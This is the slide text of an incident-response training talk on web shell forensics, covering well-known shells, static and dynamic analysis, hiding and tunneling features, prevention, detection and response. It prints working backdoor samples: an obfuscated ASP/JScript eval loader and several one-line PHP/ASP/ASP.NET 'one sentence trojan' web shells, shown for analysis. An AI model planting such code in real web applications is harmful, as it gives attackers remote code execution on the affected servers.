Upload
others
View
8
Download
0
Embed Size (px)
Citation preview
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 1
1
Advanced Web Shell Forensic Analysis
Vincent Lo
Insert Confidentiality notice here
■ PART ONE ■
2
Reminder
Advanced Web Shell Forensic Analysis
Level : Advanced
Prerequisite :
Basic understanding of server-side scripting language, such as
PHP, ASP, and ASP.NET.
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 2
3
Disclaimer
Advanced Web Shell Forensic Analysis
Opinions are my own and not the views of my employer.
4
Who is this guy?
Vincent Lo
Senior Incident Responder
CISSP, CCE, GCFA Gold, GCIH, GNFA, GREM
Twitter ● @_VincentLo_
Email ● [email protected]
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 3
5
■ PART ONE ● BASIC ■
1:00 pm – 2:00 pm
■ PART TWO ● ADVANCED ■
2:30 pm – 3:30 pm
What are we talking about today?
Agenda
6
■ PART ONE ● BASIC ■
• Introduction
� What are they?
� Well-known well shells
What are we talking about today?
Agenda
• Web Shell Analysis Techniques
� Dynamic behavior analysis
� Static source code analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 4
7
■ PART TWO ●ADVANCED ■
• Advanced source code analysis • Advanced Features
� Hidden Shells
� Tunneling
� Mass Mailer
� DDoS
� System targeted shell
What are we talking about today?
Agenda
• Web Shell Prevention
• Web Shell Detection
• Incident Response
8
• Dynamic web pages
• Written in server-side script languages, such as PHP, JSP, ASP, and
ASP.NET
• Discovered many years ago
• Still evolving….
What are they?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 5
99
Master Title
Web ShellsWhat can they do?
10
File Manager
• Copy
• Edit
• Delete
• Move
• Execute
• Upload
What can they do?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 6
11
Server Information
• Operating system information
• Loaded Apache modules
• Disabled PHP functions
• Useful commands
• Downloader commands
• /etc/passwd
What can they do?
Web Shells
12
Server Information
• CPU Info
• Memory Info
• Partition Info
• PHP Environment
What can they do?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 7
13
System Thread Information
• List
• Kill
What can they do?
Web Shells
14
Console
• Run your own commands
What can they do?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 8
15
Console
• List dir
• Find
• Locate
What can they do?
Web Shells
16
PHP
• Execute your own codes
What can they do?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 9
17
String Tools
• String conversion
• Encode/Decode
• MD5 cracking websites
What can they do?
Web Shells
18
Bruteforce
• FTP
• MySql
• PostgreSql
What can they do?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 10
19
SQL
• MySql
• PostgreSql
What can they do?
Web Shells
20
Network
• Bind port to /bin/sh
• Back-connect
What can they do?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 11
21
Self Remove
What can they do?
Web Shells
22
AND MORE…..........(will be introduced in PART TWO.)
What can they do?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 12
23
• WSO (FilesMan)
• b374n
• c99
• China Chopper (client program)
• Weevely
• And more…
Well known web shells
Web Shells
24
Well, what if they are found on your web servers?
Why do we care?
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 13
25
Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/
Real Incident
Web Shells
26
Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/
Real Incident
Web Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 14
27
How did they get into our web servers?
Web Shells
28
• Cross-Site Scripting;
• SQL Injection;
• Vulnerabilities in applications/services (e.g., WordPress or other CMS applications);
• File processing vulnerabilities (e.g., upload filtering or assigned permissions);
• Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;
• Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned above).
How did they get into our web servers?
Web Shells
Source: https://www.us-cert.gov/ncas/alerts/TA15-314A
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 15
2929
Master Title
Web Shell Analysis“If you know the enemy and yourself, you need not fe ar battles.”
30
“If you know the enemy and yourself, you need not fear battles.
If you know yourself but not the enemy, for every victory gained you will also
suffer a defeat.
If you know neither the enemy nor yourself, you will succumb in every battle.”
- The Art of War by Sun Tzu
Why do we need to analyze them?
Web Shell Analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 16
31
• Dynamic behavior analysis
• Static source code analysis
� What to look for?
� What to do if it is packed?
� What if….?
• Advanced source code analysis
How to analyze them?
Web Shell Analysis
32
• Analysis Environment
� Sandbox
� Private Network
• Operating System
� Linux
� Windows
Dynamic behavior analysis | Environment
Web Shell Analysis
• Web Server
� Apache
� IIS
� Java Web Server
• Web Server Configuration
� Permission
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 17
33
• Consulting work
� Pre-build the environment/template to reduce the response time.
� Try to mimic client’s web server environment as much as possible.
Dynamic behavior analysis | Environment
Web Shell Analysis
34
• Ideal Environment
Dynamic behavior analysis | Environment
Web Shell Analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 18
35
Demonstration
• WSO 2.0
Dynamic behavior analysis
Web Shell Analysis
36
• Pros
� Easy to understand how web shells work.
� Identify their features and artefacts in a short time.
� Can test functions and see if they really work.
• Cons
� May miss hidden functions.
� May not work if web shells require passwords.
� May need time to build/configure the environment.
Dynamic behavior analysis
Web Shell Analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 19
37
• First time?
• Need to understand the server-side script languages.
� Google can be your best friend.
• Review codes and get familiar with attack techniques.
• Don’t get discouraged and don’t give up easily.
� Some web shells are designed to be hard to read.
� Some web shells even contain fake functions/codes.
• Don’t worry. The review speed will become faster and faster once you are more familiar with the codes.
Static source code analysis
Web Shell Analysis
38
• Exercise (WSO 2.0)
• Try to identify interesting functions.
Static source code analysis | PHP | What to look for?
Web Shell Analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 20
39
• Exercise (WSO 2.0)
• Password
� Password is provided if you are lucky. ☺
� MD5 algorithm?
Static source code analysis | PHP | What to look for?
Web Shell Analysis
40
• Exercise (WSO 2.0)
• Password
� MD5 algorithm!
Static source code analysis | PHP | What to look for?
Web Shell Analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 21
41
• Exercise (WSO 2.0)
• Avoid search engines
� HTTP 404 – Not Found
� Exit
Static source code analysis | PHP | What to look for?
Web Shell Analysis
42
• Exercise (WSO 2.0)
• Commands behind the scene
Static source code analysis | PHP | What to look for?
Web Shell Analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 22
43
• Exercise (WSO 2.0)
• KOI8-R & KOI8-U
Static source code analysis | PHP | What to look for?
Web Shell Analysis
44
• Variable names
• Passwords
• Interesting functions
Static source code analysis | PHP | What to look for?
Web Shell Analysis
• Comments if you are lucky. ☺
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 23
45
• Comments ☺
Static source code analysis | PHP | What to look for?
Web Shell Analysis
46
• Find the password
• Check the source code
• Crack it
• Bypass/Kill the password
Static source code analysis | PHP | Password protecte d
Web Shell Analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 24
47
• Login password
� Validation algorithm
� MD5/SHA1
� Customised algorithm
• HTTP 404 code
• HTTP 404 page
• Variable Names
Static source code analysis | PHP | Obfuscation Techn iques
Web Shell Analysis
48
Static source code analysis | PHP | What if it is pack ed?
Web Shell Analysis
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 25
49
Static source code analysis | PHP | What if it is pack ed?
Web Shell Analysis
• Decoding environment
� Web server
� Web components
� Browser
• Decoding tools
� Online
� Manual
� May need to develop decoding tools to assist
• Encoding algorithm
� Base64
� ROT13
� Character encoding
� Customised encoding algorithms
� Multiple encoding with different
algorithms
50
Static source code analysis | PHP | What if it is pack ed?
Web Shell Analysis
• Exercise (WSO 2.1)
� How to unpack the shell?
� eval => echo
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 26
51
Static source code analysis | PHP | What if it is pack ed?
Web Shell Analysis
• Exercise (b374k)
� How to unpack the shell?
� String operators
� eval => echo
52
Intermittent
Web Shells<script runat="server" language="JScript">
function exs(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= /*///*/eval(str,a);
return(b);
}
function dec(str,key) {
var k,q,t;
var s="";
var p="";
for(k = 0; k < str.length; k=k+2)
{
t = ((k+2)/2) % key.length;
p = key.substr(t, 1);
if (isFinite(str.substr(k, 1)))
{
q = "0x"+ str.substr(k, 2);
s = s + char(int(q)-p);// + "|" + p +"|";
}
else
{
q = "0x"+ str.substr(k, 4);
s = s + char(int(q)-p);
k = k+2;
}
}
return(s);
}
</script>
<%
exs(exs(dec("556675766874782F4C75696E5E237E2360","1314")));
%>
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 27
53
Advanced Web Shell Forensic Analysis
Vincent Lo
Insert Confidentiality notice here
■ PART TWO ■
54
■ PART ONE ● BASIC ■
1:00 pm – 2:00 pm
■ PART TWO ● ADVANCED ■
2:30 pm – 3:30 pm
What are we talking about today?
Agenda
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 28
55
■ PART TWO ●ADVANCED ■
• Advanced source code analysis
• Advanced Features
� Hidden Shells
� Tunneling
� Mass Mailer
� DDoS
� System targeted shell
What are we talking about today?
Agenda
• Web Shell Prevention
• Web Shell Detection
• Incident Response
5656
Master Title
Advanced Source Code AnalysisWhat if…?
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 29
57
Demonstration
ASP | Self Changing Codes
Advanced Source Code Analysis
58
What if…?
Advanced Source Code Analysis
• What if we have not much to review?
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 30
59
What if…? | One Sentence Trojan
Advanced Source Code Analysis
• One Sentence Trojan ( 一句話木馬)
• PHP: <?php eval($_POST[cmd]);?>
• ASP: <%execute(request(”cmd"))%>
• ASP.NET: <%@ Page Language="Jscript"%>
<%eval(Request.Item[”cmd"],”unsafe”)%>
Source: http://baike.baidu.com/view/102246.htm
60
What if…? | One Sentence Trojan
Advanced Source Code Analysis
Client/Server Architecture
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 31
61
What if…? | One Sentence Trojan
Advanced Source Code Analysis
Client Programs
• China Chopper (中国菜刀)
• Lanker (lanker一句话客户端)
• ZV (ZV新型PHP一句话木马客户端GUI版)
• 一句话客户端增强版
Source: http://baike.baidu.com/view/102246.htm
62
What if…? | One Sentence Trojan
Advanced Source Code Analysis
In the real world, one sentence trojan’s codes are not always the same. They can be modified or encoded to avoid the detection.
• <%eval request("value")%>
• <%execute request("value")%>
• <%execute(request("value"))%>
• <%If Request("value")<>"" Then Execute(Request("value"))%>
• <%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"”then execute
session("value")%>
Source: http://baike.baidu.com/view/102246.htm
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 32
63
What if…? | One Sentence Trojan
Advanced Source Code Analysis
How do we analyze it?
• Web server logs
• IDS/IPS alerts
• Proxy logs
• PCAP
6464
Master Title
Advanced FeaturesHidden Shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 33
65
Hidden | JPEG
Advanced Features
JPEG EXIF
Hide malicious codes in EXIF fields or embed them in files.
Steganography
http://www.slideshare.net/saumilshah/stegosploit-hacking-with-pictures
Source: http://www.arkteam.net/?p=48
6666
Master Title
Advanced FeaturesTunneling
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 34
67
Tunneling
Advanced Features
68
SOCKS Proxy | reGeorg
Advanced Features
“The successor to reDuh, pwn a bastion webserver and create SOCKS proxies
through the DMZ. Pivot and pwn. ”
• Client is written in Python
• Support multiple server-side languages
• PHP
• ASPX
• ASHX
• JSP
Source: https://github.com/sensepost/reGeorg
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 35
69
Tunna
Advanced Features
“Tunna is a set of tools which will wrap and tunnel any TCP communication over
HTTP. It can be used to bypass network restrictions in fully firewalled environments. ”
• Client is written in Python
• Support multiple server-side languages
• PHP
• ASPX
• JSP
Source: https://github.com/SECFORCE/Tunna
7070
Master Title
Advanced FeaturesMass Mailer
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 36
71
Mass Mailer
Advanced Features
7272
Master Title
Advanced FeaturesDistributed Denial of Service
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 37
73
Why web servers?
• 24 x 7
• Accessibility
• More powerful than PCs usually
• Bandwidth
DDoS
Advanced Features
Shell Booter• Execute Booter
• Panic Stresser
• Vengeance Booter
• Anonymous Booter
• And more…
74
Advanced Features
DDoS | Shell Booter
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 38
75
Advanced Features
DDoS | Shell Booter
7676
Master Title
Advanced FeaturesSystem targeted shells
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 39
77
Advanced Features
System targeted web shells | WHMCS Killer
WHMCS
78
Advanced Features
System targeted web shells | WHMCS Killer
WHMCS Killer
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 40
79
Advanced Features
System targeted web shells | cPanel Cracker
cPanel
80
Advanced Features
System targeted web shells | cPanel Cracker
cPanel Cracker
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 41
8181
Master Title
Web Shell Prevention“Prevention is more important than detection and recovery.”
82
Web Shell Prevention
Web Shell Prevention | Attacks, Vulnerabilities, & P atches
• Web Application Firewall
• Penetration Testing
� Update codes
• Updates & Patches
� Operating System
� Web servers
� Web server components
� CMS & its plugins
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 42
83
Web Shell Prevention | Securing CMS
Web Shell Prevention
Source: https://www.us-cert.gov/ncas/alerts/TA15-314A
84
Web Shell Prevention | Securing CMS
Web Shell Prevention
Source: http://asd.gov.au/publications/protect/securing-cms.htm
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 43
85
Web Shell Prevention
Web Shell Prevention | Securing CMS
Hardening Wordpresshttp://codex.wordpress.org/Hardening_WordPress
Joomla – Security Checklisthttps://docs.joomla.org/Security_Checklist
86
Web Shell Prevention
Web Shell Prevention | Upload Function
• Check uploaded files
� Whitelist file extensions
� Check file extension properly
� .php.jpg, .jpg.asp, .php;.jpg and so on.
� Don’t rely on file types
� Be careful about .cer if using IIS
• Randomize uploaded filenames
• Disable “execute” permission
• Don’t call itself “upload”� upload.aspx, upload.php and so on.
• Don’t show the actual path
• Error message
• URL
• Re-encode/re-generate images
• Disable components/functions that are not required.
� eval, base64, gzinflate
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 44
8787
Master Title
Web Shell DetectionAre they on our servers?
88
• PHP Shell Detector
• NeoPI
• Web Vulnerability Scanners
• Antivirus programs
• IDS/IPS
Web Shell Detection | How do we detect them?
Web Shell Detection
• File Integrity System
• Customised Script
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 45
8989
Master Title
Incident ResponseFind evil
90
• Web server logs
• Check integrity of logs
• Fields
• Proxy logs
• Web site files
• Relevant servers’ logs & artifacts
Find evil | Evidence
Incident Response
• IDS/IPS logs
• Firewall logs
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 46
91
• Yara
• Grep
Find evil | How do we find them?
Incident Response
92
Find evil | Experience
Incident Response
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 47
93
Find evil | Experience
Incident Response
9494
Master Title
RecapWhat do we learn today?
Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016
Vincent Lo, LYLC Spear & Shield 48
95
• Well-known web shells
• Dynamic analysis
• Static analysis
• Web shell prevention and detection
• Incident response
• The analysis concept we learn today works for analyzing malicious PowerShell scripts too.
What do we learn today?
Recap
96
Vincent Lo | Senior Incident ResponderTWITTER ■@_VincentLo_
EMAIL ■ [email protected]
LYLC-SPEARANDSHIELD.TUMBLR.COM
THANK YOUTHANK YOU